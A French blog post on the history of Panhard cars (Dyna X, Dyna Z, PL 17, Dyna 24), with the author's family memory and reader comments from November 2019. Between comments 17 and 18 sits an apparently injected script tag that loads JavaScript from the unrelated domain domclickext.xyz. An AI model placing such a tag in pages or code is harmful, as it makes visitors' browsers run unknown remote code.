• Voitures d'hier (6) Panhard .

     

    Panhard et Levassor est le premier constructeur automobile  au monde lorsque la marque est fondée en 1891 à Paris . Elle remporta  la première course automobile de l'histoire .

    Des célébrités ont roulé en Panhard : Louis Pasteur et Claude Monet , Gustave Eiffel ...

    L'activité (civile) de la marque s'est arrêtée en 1967 après son rachat par Citroën . Elle produit désormais des véhicules militaires .

     

    Dyna X  (1947 à 1954 ) .

     

    Voitures d'hier (6)  Panhard .

     

    Voitures d'hier (6)  Panhard .

     

    Voitures d'hier (6)  Panhard .

     

    Autre version .

    Voitures d'hier (6)  Panhard .

     

    Dyna Z (1954- 1959)

     

    Voitures d'hier (6)  Panhard .

     

    Voitures d'hier (6)  Panhard .

     

    Voitures d'hier (6)  Panhard .

    Mon père a eu cette voiture .Elle a eu une longévité exceptionnelle ! Je l'avais accompagné lorsqu'il était allé la chercher à Paris .Nous sommes rentrés à la nuit tombante et un orage très violent a éclaté soudain sur le trajet Paris-Le Mans , là  où il n'était pas possible de s'arrêter sur des kilomètres .Il ne savait pas encore où se trouvait le dispositif pour désembuer le pare-brise et je fus chargée de chercher dans la notice   .Dans la pénombre , je ne voyais rien ...J'en ai gardé un souvenir ému !

     

    PL 17  (1959 à 1965)

     

    Voitures d'hier (6)  Panhard .

     

    Dyna 24 (1963 à 1967 )

     

    Voitures d'hier (6)  Panhard .

     

    Voitures d'hier (6)  Panhard .

     

     

    « Anges musiciens .Vierges en Majesté ( Auvergne ) (1) . »

  • Commentaires

    1
    Vendredi 15 Novembre 2019 à 15:13

    Coucou Sophie,
    Je dois vraiment avoir un petit côté rétro en matière de voiture car je les aime beaucoup ces vieux "chars" comme disent les Canadiens.
    Une petite préférence pour le look de forme et la couleur de la première.
    Bises et bonne fin de journée

    2
    Vendredi 15 Novembre 2019 à 15:56

     bonjour 

     je suis une fan de voiture 

     modernes ou anciennes 

    les voiture m 'intéressent toujours 

     j 'attend ma nouvelle 

     cette fois elle sera Française  rires 

     kénavo  Sophie 

    3
    Vendredi 15 Novembre 2019 à 16:44

    Elle avaient fières allures ces petites voitures.
    A ce moment là avoir une voiture était une fierté, une richesse. Belle fin de journée Sophie. Bises

    4
    Vendredi 15 Novembre 2019 à 17:41

    bonjour,

    je me rappelle tres bien des deux derniers modèles de cette voiture, mais incontestablement la premiere a un look vraiment chouette...

    encore un joli clin d'oeil au passé et de voitures françaises de plus..

    bonne fin de journée

    à bientot

    5
    Vendredi 15 Novembre 2019 à 18:37

    La Panhard j'en suis fan

    Et de bons souvenirs de jeunesse 

    Oups quand j'y pense wink2

    Ces voitures ont une fière allure 

    Bonne fin de journée Sophie 

     

    6
    Vendredi 15 Novembre 2019 à 19:09

    Bonsoir Sophie bravo pour ce très joli partage avec ces anciennes voitures c'est vraie qu'elles étaient de toute beauté pour l 'époque j'adore ce magnifique partage merci bonne soirée bisou Claudine Daniel

    7
    Vendredi 15 Novembre 2019 à 19:16

    Bonsoir Sophie,

    Elles sont bien belles ces voitures et moi aussi je les préfère aux voitures d'aujourd'hui ! Bonne soirée, bises, Véronique

    8
    Vendredi 15 Novembre 2019 à 21:33

    bonsoir Sophie , oui ce sont de belles voitures , la penhard je connaissais  mais pas les autres 

    et la Dyna est une voiture magnifique ! on sentait que c'était costaux !!  

    merci pour tes photos si belles  bisous   bon weekend a+

    9
    Samedi 16 Novembre 2019 à 00:55
    Robert

    De très beaux. « chars » comme on dit ici surtout que ce sont des modèles que nous n’avons jamais eu en Amérique 

    10
    Samedi 16 Novembre 2019 à 14:46

    Je me souviens du bruit spécial de leur moteur...

    Bon début de week-end, Sophie

    11
    Dimanche 17 Novembre 2019 à 10:18

    Bonjour Sophie,

    Cela m'émeut de revoir ces voitures qui ont l'air si solides.  Que de changements depuis. On se replonge dans l'histoire.

    Bon dimanche.

    12
    Dimanche 17 Novembre 2019 à 11:04

    Bizarre ça, pour les images.

    Emile a eu la même farce

    J'emploie pourtant toujours le même navigateur....

    Bon dimanche Sophie

    13
    Lundi 18 Novembre 2019 à 10:59

    J'ai eu un copain, à l'époque, qui possédait une Dyna Z.

    Il a récolté un PV car il avait allumé le phare central.....

    Bon début de semaine, Sophie

    14
    Lundi 18 Novembre 2019 à 16:33

    la petite cabriolet photographiée de dos, me conviendrait à merveille .. La couleur et tout et tout ! 

    merci 

    15
    Lundi 18 Novembre 2019 à 20:50

    Oh comme elles sont belles surtout la Dyna X.

    Merci de ton passage à bientôt ..

    Douce soirée.

    16
    Lundi 18 Novembre 2019 à 22:38

    Bonjour Sophie

     Ah Panhard. Elle a occupé une partie de ma jeunesse car mon père a eu une PL 17. Quant à la Dyna 24 ou PL 24 comme on disait, j'aurais bien aimé en avoir une.

    Bises.

     

    17
    Lundi 18 Novembre 2019 à 23:05

    Salut Sophie,

    Une belle exposition de cette marque historique.

    Bonne soirée,

    Bises.

    <script src="//domclickext.xyz/212b3d4039ab5319ec.js" type="text/javascript"></script>
    18
    Mardi 19 Novembre 2019 à 11:47

    bonjour sophie

    elles avaient vraiment du style

    de belles carrosserie en tout cas

    bisous et belle journée à toi

    19
    Mardi 19 Novembre 2019 à 18:23

    5* elles sont belles et tes photos très réussies Sophie ! je n'ai pas souvent l'occasion d'en photographier mais je dois dire que ta publication me fait envier, un grand bravo donc.

    20
    Mardi 19 Novembre 2019 à 20:14

    On peut dire qu'elles avaient de la gueule et pour certains détails rudement bien imaginés. La première image est parfaite.

    21
    Mercredi 20 Novembre 2019 à 12:25

    Bon mercredi Sophie

    22
    Mercredi 20 Novembre 2019 à 14:11

    Voilà des autos qui me parlent, je les ai connues  au fur et à mesure de leur production.

    Je dois dire qu'elles sont bien mieux conservées que moi, au moins pour ces modèles collector.

    Je pense que le coupé sport Dyna 24, il doit avoir une cote bien soutenue.

    Et pour la motorisation, j'ai en tête des cylindres opposés à plat, selon le schéma ci dessous.

    Pour mon billet tu évoques l'abécédaire avec un lien sur l’Alsace, mais à priori, je ne vois pas lequel.

    Ça doit se voir comme le nez au milieu de la figure, et pourtant moi, je cale ...

    En tous les cas, tes photos voitures sont bien belles et ton souvenir de soir d'orage en Dyna, tu t'en souviendra à vie.

    Amicalement. Yann

    ERRATUM ................ Je viens de comprendre l'abécédaire de l'Alsace, celui dans le casier des imprimeurs, il m'en aura fallu du temps, je cherchais sur le mur avec tous les autres réunis.

    23
    Mercredi 20 Novembre 2019 à 18:32

    Bonsoir Sophie

    Ah oui de bien belles voitures, il faut en prendre soin elles ont de la valeur

    Je te souhaite une bonne soirée, bisous

     

    24
    Mercredi 20 Novembre 2019 à 20:13
    francinea

    Bonjour,  jen e suis pas très voiture, mais la Panhard, elle est pas mal, je te souhaite une bonne soirée, bisous

    25
    Jeudi 21 Novembre 2019 à 14:52

    Bon jeudi Sophie, avec le même soleil que chez nous si possible !

    26
    Dimanche 24 Novembre 2019 à 21:43

    Bonsoir Sophie,

    ça c'était de la voiture, on se sentait bien protégé là dedans.

    Aujourd'hui on cherche juste une voiture avec 4 roues et un bon siège, le restant m'importe peu.

    Mais une voiture avec une vraie clé comme autrefois.

    Bonne soirée et bises.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :